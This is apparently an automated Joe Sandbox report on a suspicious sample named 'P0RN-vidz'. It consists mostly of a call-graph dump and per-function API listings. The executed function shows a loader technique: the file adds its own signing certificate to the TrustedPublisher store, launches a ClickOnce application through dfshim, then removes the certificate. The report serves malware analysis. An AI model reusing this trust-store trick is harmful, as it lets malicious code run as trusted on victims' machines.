376799 5417->5423 5425 3749b9 _free 15 API calls 5419->5425 5458 3762c6 5420->5458 5421 376733 5421->5412 5427 3749b9 15 API calls _free 5421->5427 5422->5403 5423->5398 5424->5415 5429 3766c2 5424->5429 5425->5428 5427->5421 5470 3767ca 5428->5470 5429->5411 5431 3761d9 5430->5431 5457 3762c2 5430->5457 5432 3761ea 5431->5432 5434 3749b9 _free 15 API calls 5431->5434 5433 3761fc 5432->5433 5435 3749b9 _free 15 API calls 5432->5435 5436 37620e 5433->5436 5437 3749b9 _free 15 API calls 5433->5437 5434->5432 5435->5433 5438 376220 5436->5438 5439 3749b9 _free 15 API calls 5436->5439 5437->5436 5440 3749b9 _free 15 API calls 5438->5440 5442 376232 5438->5442 5439->5438 5440->5442 5441 3749b9 _free 15 API calls 5443 376244 5441->5443 5442->5441 5442->5443 5444 3749b9 _free 15 API calls 5443->5444 5445 376256 5443->5445 5444->5445 5446 376268 5445->5446 5447 3749b9 _free 15 API calls 5445->5447 5448 37627a 5446->5448 5450 3749b9 _free 15 API calls 5446->5450 5447->5446 5449 37628c 5448->5449 5451 3749b9 _free 15 API calls 5448->5451 5452 37629e 5449->5452 5453 3749b9 _free 15 API calls 5449->5453 5450->5448 5451->5449 5454 3762b0 5452->5454 5455 3749b9 _free 15 API calls 5452->5455 5453->5452 5456 3749b9 _free 15 API calls 5454->5456 5454->5457 5455->5454 5456->5457 5457->5424 5459 3762d3 5458->5459 5469 37632b 5458->5469 5460 3762e3 5459->5460 5461 3749b9 _free 15 API calls 5459->5461 5462 3749b9 _free 15 API calls 5460->5462 5463 3762f5 5460->5463 5461->5460 5462->5463 5464 376307 5463->5464 5465 3749b9 _free 15 API calls 5463->5465 5466 376319 5464->5466 5467 3749b9 _free 15 API calls 5464->5467 5465->5464 5468 3749b9 _free 15 API calls 5466->5468 5466->5469 5467->5466 5468->5469 5469->5429 5471 3767f5 5470->5471 5472 3767d7 5470->5472 5471->5421 5472->5471 5473 37636b __fassign 15 API calls 5472->5473 5474 3767ef 5473->5474 5475 3749b9 _free 15 API calls 5474->5475 5475->5471 5476->5401 5509 376bd2 5477->5509 5480 376cbf 5481 376ccb _abort 5480->5481 5486 376cf8 _abort 5481->5486 5487 376cf2 _abort 5481->5487 5523 3745f8 GetLastError 5481->5523 5483 376d44 5484 374949 _free 15 API calls 5483->5484 5485 376d49 5484->5485 5542 37488d 5485->5542 5491 376d70 5486->5491 5545 375832 EnterCriticalSection 5486->5545 5487->5483 5487->5486 5489 376d27 _abort 5487->5489 5489->5334 5492 376dcf 5491->5492 5494 376dc7 5491->5494 5502 376dfa 5491->5502 5546 37587a LeaveCriticalSection 5491->5546 5492->5502 5547 376cb6 5492->5547 5497 3738e3 _abort 23 API calls 5494->5497 5497->5492 5500 374574 _abort 33 API calls 5503 376e5d 5500->5503 5501 376cb6 _abort 33 API calls 5501->5502 5550 376e7f 5502->5550 5503->5489 5504 374574 _abort 33 API calls 5503->5504 5504->5489 5506 3746df _abort 5505->5506 5507 37470b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5506->5507 5508 3747dc _abort _ValidateLocalCookies 5507->5508 5508->5341 5512 376b78 5509->5512 5511 374079 5511->5334 5511->5480 5513 376b84 ___scrt_is_nonwritable_in_current_image 5512->5513 5518 375832 EnterCriticalSection 5513->5518 5515 376b92 5519 376bc6 5515->5519 5517 376bb9 _abort 5517->5511 5518->5515 5522 37587a LeaveCriticalSection 5519->5522 5521 376bd0 5521->5517 5522->5521 5524 374611 5523->5524 5525 374617 5523->5525 5527 375a54 _abort 6 API calls 5524->5527 5526 37495c _abort 12 API calls 5525->5526 5529 37466e SetLastError 5525->5529 5528 374629 5526->5528 5527->5525 5530 374631 5528->5530 5532 375aaa _abort 6 API calls 5528->5532 5531 374677 5529->5531 5533 3749b9 _free 12 API calls 5530->5533 5531->5487 5534 374646 5532->5534 5535 374637 5533->5535 5534->5530 5536 37464d 5534->5536 5537 374665 SetLastError 5535->5537 5538 3743e6 _abort 12 API calls 5536->5538 5537->5531 5539 374658 5538->5539 5540 3749b9 _free 12 API calls 5539->5540 5541 37465e 5540->5541 5541->5529 5541->5537 5554 374812 5542->5554 5544 374899 5544->5489 5545->5491 5546->5494 5548 374574 _abort 33 API calls 5547->5548 5549 376cbb 5548->5549 5549->5501 5551 376e85 5550->5551 5552 376e4e 5550->5552 5566 37587a LeaveCriticalSection 5551->5566 5552->5489 5552->5500 5552->5503 5555 3745f8 _free 15 API calls 5554->5555 5556 374828 5555->5556 5560 374836 _ValidateLocalCookies 5556->5560 5562 37489d IsProcessorFeaturePresent 5556->5562 5558 37488c 5559 374812 _abort 21 API calls 5558->5559 5561 374899 5559->5561 5560->5544 5561->5544 5563 3748a8 5562->5563 5564 3746c3 _abort 3 API calls 5563->5564 5565 3748bd GetCurrentProcess TerminateProcess 5564->5565 5565->5558 5566->5552 5567->5273 5571 37587a LeaveCriticalSection 5568->5571 5570 375431 5570->5273 5571->5570 5573 3740df 5572->5573 5574 3740d5 5572->5574 5573->5574 5575 374574 _abort 33 API calls 5573->5575 5574->5278 5574->5279 5576 374100 5575->5576 5580 377421 5576->5580 5581 377434 5580->5581 5582 374119 5580->5582 5581->5582 5588 3768a4 5581->5588 5584 37744e 5582->5584 5585 377461 5584->5585 5587 377476 5584->5587 5586 375399 __fassign 33 API calls 5585->5586 5585->5587 5586->5587 5587->5574 5589 3768b0 ___scrt_is_nonwritable_in_current_image 5588->5589 5590 374574 _abort 33 API calls 5589->5590 5591 3768b9 5590->5591 5592 376907 _abort 5591->5592 5600 375832 EnterCriticalSection 5591->5600 5592->5582 5594 3768d7 5601 37691b 5594->5601 5599 374074 _abort 33 API calls 5599->5592 5600->5594 5602 376929 __fassign 5601->5602 5604 3768eb 5601->5604 5603 376657 __fassign 15 API calls 5602->5603 5602->5604 5603->5604 5605 37690a 5604->5605 5608 37587a LeaveCriticalSection 5605->5608 5607 3768fe 5607->5592 5607->5599 5608->5607 5612 375120 5609->5612 5616 3751ca _ValidateLocalCookies 5609->5616 5611 375181 5629 377e21 5611->5629 5617 37649d 5612->5617 5615 377e21 38 API calls 5615->5616 5616->5294 5618 3740c2 __fassign 33 API calls 5617->5618 5619 3764bd MultiByteToWideChar 5618->5619 5621 3764fb 5619->5621 5624 376593 _ValidateLocalCookies 5619->5624 5623 37644f 16 API calls 5621->5623 5626 37651c _abort __alloca_probe_16 5621->5626 5622 37658d 5634 3765ba 5622->5634 5623->5626 5624->5611 5626->5622 5627 376561 MultiByteToWideChar 5626->5627 5627->5622 5628 37657d GetStringTypeW 5627->5628 5628->5622 5630 3740c2 __fassign 33 API calls 5629->5630 5631 377e34 5630->5631 5638 377c04 5631->5638 5633 3751a2 5633->5615 5635 3765c6 5634->5635 5636 3765d7 5634->5636 5635->5636 5637 3749b9 _free 15 API calls 5635->5637 5636->5624 5637->5636 5639 377c1f 5638->5639 5640 377c45 MultiByteToWideChar 5639->5640 5641 377c6f 5640->5641 5642 377df9 _ValidateLocalCookies 5640->5642 5643 37644f 16 API calls 5641->5643 5645 377c90 __alloca_probe_16 5641->5645 5642->5633 5643->5645 5644 377cd9 MultiByteToWideChar 5646 377cf2 5644->5646 5659 377d45 5644->5659 5645->5644 5645->5659 5663 375b65 5646->5663 5648 3765ba __freea 15 API calls 5648->5642 5649 377d09 5650 377d54 5649->5650 5651 377d1c 5649->5651 5649->5659 5652 377d75 __alloca_probe_16 5650->5652 5655 37644f 16 API calls 5650->5655 5653 375b65 6 API calls 5651->5653 5651->5659 5654 377dea 5652->5654 5656 375b65 6 API calls 5652->5656 5653->5659 5657 3765ba __freea 15 API calls 5654->5657 5655->5652 5658 377dc9 5656->5658 5657->5659 5658->5654 5660 377dd8 WideCharToMultiByte 5658->5660 5659->5648 5660->5654 5661 377e18 5660->5661 5662 3765ba __freea 15 API calls 5661->5662 5662->5659 5664 375891 _abort 5 API calls 5663->5664 5665 375b8c 5664->5665 5666 375b95 _ValidateLocalCookies 5665->5666 5669 375bed 5665->5669 5666->5649 5668 375bd5 LCMapStringW 5668->5666 5670 375891 _abort 5 API calls 5669->5670 5671 375c14 _ValidateLocalCookies 5670->5671 5671->5668 5673 374ead ___scrt_is_nonwritable_in_current_image 5672->5673 5680 375832 EnterCriticalSection 5673->5680 5675 374eb7 5681 374f0c 5675->5681 5679 374ed0 _abort 5679->5308 5680->5675 5693 37562c 5681->5693 5683 374f5a 5684 37562c 21 API calls 5683->5684 5685 374f76 5684->5685 5686 37562c 21 API calls 5685->5686 5687 374f94 5686->5687 5688 374ec4 5687->5688 5689 3749b9 _free 15 API calls 5687->5689 5690 374ed8 5688->5690 5689->5688 5707 37587a LeaveCriticalSection 5690->5707 5692 374ee2 5692->5679 5694 37563d 5693->5694 5703 375639 5693->5703 5695 375644 5694->5695 5698 375657 _abort 5694->5698 5696 374949 _free 15 API calls 5695->5696 5697 375649 5696->5697 5699 37488d _abort 21 API calls 5697->5699 5700 375685 5698->5700 5701 37568e 5698->5701 5698->5703 5699->5703 5702 374949 _free 15 API calls 5700->5702 5701->5703 5704 374949 _free 15 API calls 5701->5704 5705 37568a 5702->5705 5703->5683 5704->5705 5706 37488d _abort 21 API calls 5705->5706 5706->5703 5707->5692 5709 3740c2 __fassign 33 API calls 5708->5709 5710 3756c1 5709->5710 5710->5098 5712 3736ba _abort 5711->5712 5713 3736d2 5712->5713 5726 373808 GetModuleHandleW 5712->5726 5733 375832 EnterCriticalSection 5713->5733 5720 3737c1 _abort 5720->5132 5721 37374f _abort 5737 3737b8 5721->5737 5724 3736da 5724->5721 5734 373de7 5724->5734 5727 3736c6 5726->5727 5727->5713 5728 37384c GetModuleHandleExW 5727->5728 5729 373876 GetProcAddress 5728->5729 5730 37388b 5728->5730 5729->5730 5731 37389f FreeLibrary 5730->5731 5732 3738a8 _ValidateLocalCookies 5730->5732 5731->5732 5732->5713 5733->5724 5748 373b20 5734->5748 5768 37587a LeaveCriticalSection 5737->5768 5739 373791 5739->5720 5740 3737c7 5739->5740 5769 375c6f 5740->5769 5742 3737d1 5743 3737f5 5742->5743 5744 3737d5 GetPEB 5742->5744 5746 37384c _abort 3 API calls 5743->5746 5744->5743 5745 3737e5 GetCurrentProcess TerminateProcess 5744->5745 5745->5743 5747 3737fd ExitProcess 5746->5747 5751 373acf 5748->5751 5750 373b44 5750->5721 5752 373adb ___scrt_is_nonwritable_in_current_image 5751->5752 5759 375832 EnterCriticalSection 5752->5759 5754 373ae9 5760 373b70 5754->5760 5756 373af6 5764 373b14 5756->5764 5758 373b07 _abort 5758->5750 5759->5754 5761 373b98 5760->5761 5762 373b90 _ValidateLocalCookies 5760->5762 5761->5762 5763 3749b9 _free 15 API calls 5761->5763 5762->5756 5763->5762 5767 37587a LeaveCriticalSection 5764->5767 5766 373b1e 5766->5758 5767->5766 5768->5739 5770 375c94 5769->5770 5772 375c8a _ValidateLocalCookies 5769->5772 5771 375891 _abort 5 API calls 5770->5771 5771->5772 5772->5742 5926 374a0b 5927 374a1b 5926->5927 5936 374a31 5926->5936 5928 374949 _free 15 API calls 5927->5928 5929 374a20 5928->5929 5930 37488d _abort 21 API calls 5929->5930 5932 374a2a 5930->5932 5933 374a9b 5933->5933 5956 37333c 5933->5956 5934 374b09 5938 3749b9 _free 15 API calls 5934->5938 5936->5933 5939 374b7c 5936->5939 5945 374b9b 5936->5945 5937 374b00 5937->5934 5942 374b8e 5937->5942 5962 377b0b 5937->5962 5938->5939 5971 374db5 5939->5971 5943 37489d _abort 6 API calls 5942->5943 5944 374b9a 5943->5944 5946 374ba7 5945->5946 5946->5946 5947 37495c _abort 15 API calls 5946->5947 5948 374bd5 5947->5948 5949 377b0b 21 API calls 5948->5949 5950 374c01 5949->5950 5951 37489d _abort 6 API calls 5950->5951 5952 374c30 _abort 5951->5952 5953 374cd1 FindFirstFileExA 5952->5953 5954 374d20 5953->5954 5955 374b9b 21 API calls 5954->5955 5957 373351 5956->5957 5958 37334d 5956->5958 5957->5958 5959 37495c _abort 15 API calls 5957->5959 5958->5937 5960 37337f 5959->5960 5961 3749b9 _free 15 API calls 5960->5961 5961->5958 5963 377a5a 5962->5963 5964 377a74 5963->5964 5967 377a6f 5963->5967 5969 377aab 5963->5969 5964->5937 5965 374949 _free 15 API calls 5966 377a9a 5965->5966 5968 37488d _abort 21 API calls 5966->5968 5967->5964 5967->5965 5968->5964 5969->5964 5970 374949 _free 15 API calls 5969->5970 5970->5966 5972 374dbf 5971->5972 5973 374dcf 5972->5973 5974 3749b9 _free 15 API calls 5972->5974 5975 3749b9 _free 15 API calls 5973->5975 5974->5972 5976 374dd6 5975->5976 5976->5932 6762 371489 6765 371854 6762->6765 6764 37148e 6764->6764 6766 37186a 6765->6766 6768 371873 6766->6768 6769 371807 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6766->6769 6768->6764 6769->6768 6499 371248 6500 371250 6499->6500 6516 373947 6500->6516 6502 37125b 6523 371665 6502->6523 6504 371920 4 API calls 6506 3712f2 6504->6506 6505 371270 __RTC_Initialize 6514 3712cd 6505->6514 6529 3717f2 6505->6529 6508 371289 6508->6514 6532 3718ac InitializeSListHead 6508->6532 6510 37129f 6533 3718bb 6510->6533 6512 3712c2 6539 3739e1 6512->6539 6514->6504 6515 3712ea 6514->6515 6517 373956 6516->6517 6518 373979 6516->6518 6517->6518 6519 374949 _free 15 API calls 6517->6519 6518->6502 6520 373969 6519->6520 6521 37488d _abort 21 API calls 6520->6521 6522 373974 6521->6522 6522->6502 6524 371671 6523->6524 6525 371675 6523->6525 6524->6505 6526 371920 4 API calls 6525->6526 6528 371682 ___scrt_release_startup_lock 6525->6528 6527 3716eb 6526->6527 6528->6505 6546 3717c5 6529->6546 6532->6510 6612 373f7a 6533->6612 6535 3718cc 6536 3718d3 6535->6536 6537 371920 4 API calls 6535->6537 6536->6512 6538 3718db 6537->6538 6538->6512 6540 374574 _abort 33 API calls 6539->6540 6541 3739ec 6540->6541 6542 373a24 6541->6542 6543 374949 _free 15 API calls 6541->6543 6542->6514 6544 373a19 6543->6544 6545 37488d _abort 21 API calls 6544->6545 6545->6542 6547 3717d4 6546->6547 6548 3717db 6546->6548 6552 373dd1 6547->6552 6555 373e41 6548->6555 6551 3717d9 6551->6508 6553 373e41 24 API calls 6552->6553 6554 373de3 6553->6554 6554->6551 6558 373b48 6555->6558 6561 373a7e 6558->6561 6560 373b6c 6560->6551 6562 373a8a ___scrt_is_nonwritable_in_current_image 6561->6562 6569 375832 EnterCriticalSection 6562->6569 6564 373a98 6570 373c90 6564->6570 6566 373aa5 6580 373ac3 6566->6580 6568 373ab6 _abort 6568->6560 6569->6564 6571 373cae 6570->6571 6578 373ca6 _abort 6570->6578 6572 373d07 6571->6572 6571->6578 6583 37696b 6571->6583 6574 37696b 24 API calls 6572->6574 6572->6578 6576 373d1d 6574->6576 6575 373cfd 6577 3749b9 _free 15 API calls 6575->6577 6579 3749b9 _free 15 API calls 6576->6579 6577->6572 6578->6566 6579->6578 6611 37587a LeaveCriticalSection 6580->6611 6582 373acd 6582->6568 6584 376976 6583->6584 6585 37699e 6584->6585 6586 37698f 6584->6586 6589 3769ad 6585->6589 6592 377f63 6585->6592 6587 374949 _free 15 API calls 6586->6587 6591 376994 _abort 6587->6591 6599 377f96 6589->6599 6591->6575 6593 377f83 HeapSize 6592->6593 6594 377f6e 6592->6594 6593->6589 6595 374949 _free 15 API calls 6594->6595 6596 377f73 6595->6596 6597 37488d _abort 21 API calls 6596->6597 6598 377f7e 6597->6598 6598->6589 6600 377fa3 6599->6600 6601 377fae 6599->6601 6602 37644f 16 API calls 6600->6602 6603 377fb6 6601->6603 6609 377fbf _abort 6601->6609 6607 377fab 6602->6607 6604 3749b9 _free 15 API calls 6603->6604 6604->6607 6605 377fc4 6608 374949 _free 15 API calls 6605->6608 6606 377fe9 HeapReAlloc 6606->6607 6606->6609 6607->6591 6608->6607 6609->6605 6609->6606 6610 376ae2 _abort 2 API calls 6609->6610 6610->6609 6611->6582 6613 373f98 6612->6613 6617 373fb8 6612->6617 6614 374949 _free 15 API calls 6613->6614 6615 373fae 6614->6615 6616 37488d _abort 21 API calls 6615->6616 6616->6617 6617->6535

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00371000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199encryptionmemorylibraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000104), ref: 00371016
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00371025
                                                                                                                                                                                                                                          • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00371032
                                                                                                                                                                                                                                          • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00371057
                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00040000), ref: 00371063
                                                                                                                                                                                                                                          • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00371082
                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 003710B2
                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,?), ref: 003710C5
                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00002000), ref: 003710F4
                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0037110A
                                                                                                                                                                                                                                          • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0037111A
                                                                                                                                                                                                                                          • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0037112D
                                                                                                                                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 00371134
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0037113E
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0037115D
                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0037116E
                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00371182
                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00371198
                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 003711A9
                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(dfshim), ref: 003711BA
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 003711C6
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00009C40), ref: 003711E8
                                                                                                                                                                                                                                          • CertDeleteCertificateFromStore.CRYPT32(?), ref: 0037120B
                                                                                                                                                                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 0037121A
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00371223
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00371228
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0037122D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                          • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                          • API String ID: 335784236-860318880
                                                                                                                                                                                                                                          • Opcode ID: 5131c8094e1da74f9621551c506ed704ad73a0763b3952b2a2ef3a8f70828a10
                                                                                                                                                                                                                                          • Instruction ID: 70f1c23fa54f1e3e54da7d68f061d00e1350de3fd3477ecd273b1563b85fc5f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5131c8094e1da74f9621551c506ed704ad73a0763b3952b2a2ef3a8f70828a10
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05616172A40218AFEB329B94DC49FAFBBB9FF48B50F114014F618B7190C7759941DBA4

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 00371920 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0037192C
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 003719F8
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00371A11
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00371A1B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                          • Opcode ID: 9b41c37f8668421c833993fad24adba5a9ed3daf62ac45096ded57994ca196f6
                                                                                                                                                                                                                                          • Instruction ID: 7c4574fe4b4e57ade8232a5366ff139e2df65ca111bf79a018281e88bbb4e184
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b41c37f8668421c833993fad24adba5a9ed3daf62ac45096ded57994ca196f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A310AB5D0521C9BDF21DFA4D9497CDBBB8AF08300F1041AAE50DAB250EB749B85CF45
                                                                                                                                                                                                                                          Function 003746C3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 003747BB
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 003747C5
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 003747D2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                          • Opcode ID: e3356dc70a3748ee4441f4c75a695bcbfd1071cb84cf98f65206b8bcd44900cf
                                                                                                                                                                                                                                          • Instruction ID: 2fab90c019423af6d7453234275119b9f3be30ab7717029df20cb85fe6a904f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3356dc70a3748ee4441f4c75a695bcbfd1071cb84cf98f65206b8bcd44900cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831C67590122CABCB22DF68DC89B8DB7B8BF08311F5081DAE41CA7251EB349F858F44
                                                                                                                                                                                                                                          Function 003737C7 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0037379D,?,003802F0,0000000C,003738F4,?,00000002,00000000,?,003740B6,00000003,003721EF,00371AFD), ref: 003737E8
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0037379D,?,003802F0,0000000C,003738F4,?,00000002,00000000,?,003740B6,00000003,003721EF,00371AFD), ref: 003737EF
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00373801
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 2c5940d30c38438352e697c0cbd34943049dd59b6d6c286c3eabe061df6e155d
                                                                                                                                                                                                                                          • Instruction ID: 54eedf6877ef747118f8854647af2e968875758294f2430d3ea3bff47cc7e99b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c5940d30c38438352e697c0cbd34943049dd59b6d6c286c3eabe061df6e155d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6E012B1000248EBCB23AF54DD09B4A7B7DFF00351F008014F81D8A122EB39DA82DA40
                                                                                                                                                                                                                                          Function 00374B9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                                                                                          • Opcode ID: 802d375b4b73ef7019fa56da8dd41a1ffea8ed768c8dac352c77c3add15a143b
                                                                                                                                                                                                                                          • Instruction ID: f1a1149b790d062145d16b269f6a7173212e7b60d731167d71474f0a373c1a3e
